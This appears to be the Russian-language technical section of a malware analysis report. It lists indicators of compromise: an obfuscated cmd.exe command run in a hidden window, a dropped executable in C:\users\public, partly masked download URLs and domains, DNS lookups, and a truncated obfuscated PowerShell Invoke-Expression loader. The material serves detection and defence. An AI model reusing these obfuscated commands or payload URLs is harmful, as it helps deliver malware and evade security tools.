Техническая информация
- '<SYSTEM32>\cmd.exe' DGwcCCfYzW ZPproWDovCOhIQiOifjXiiLh LauziMijSVQ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %AlRnLkanaQRlhwr%=hrmQMdpbcmMN&&set %QpmjIHZzMWwJ%=p&&set %NLGqwLnj...
- C:\users\public\267743.exe
- C:\users\public\267743.exe
- 'ne###ribe.jp':80
- 'mt##t.ro':80
- 'he####gevillage.ca':80
- 'vi####emorylane.ca':80
- 'vi####emorylane.ca':443
- 'id##en.com':80
- http://ne###ribe.jp/vDjAb/
- http://cd#.##t-tribe.jp/404.html
- http://mt##t.ro/BO2c/
- http://he####gevillage.ca/Fl5Ze/
- http://vi####emorylane.ca/Fl5Ze/
- http://id##en.com/O5gMuYH/
- 'he####gevillage.ca':443
- DNS ASK ne###ribe.jp
- DNS ASK cd#.##t-tribe.jp
- DNS ASK xn#####yd1cy656a.net
- DNS ASK mt##t.ro
- DNS ASK he####gevillage.ca
- DNS ASK vi####emorylane.ca
- DNS ASK id##en.com
- '<SYSTEM32>\cmd.exe' DGwcCCfYzW ZPproWDovCOhIQiOifjXiiLh LauziMijSVQ & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %AlRnLkanaQRlhwr%=hrmQMdpbcmMN&&set %QpmjIHZzMWwJ%=p&&set %NLGqwLnj...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " .('I'+'nv'+'oKe'+'-E'+'XPreSSIo'+'N') ( ( .('New-O'+'bjEc'+'t') ('Ma'+'n'+'AGemeNt.'+'AUtomA'+'TIOn.PscReDEnT'+'iAl') ' ',('76492d1116743f0423413b16050a5345MgB8ADMAMQBTAE8AVAAwAHIAcwBXACsAWQ...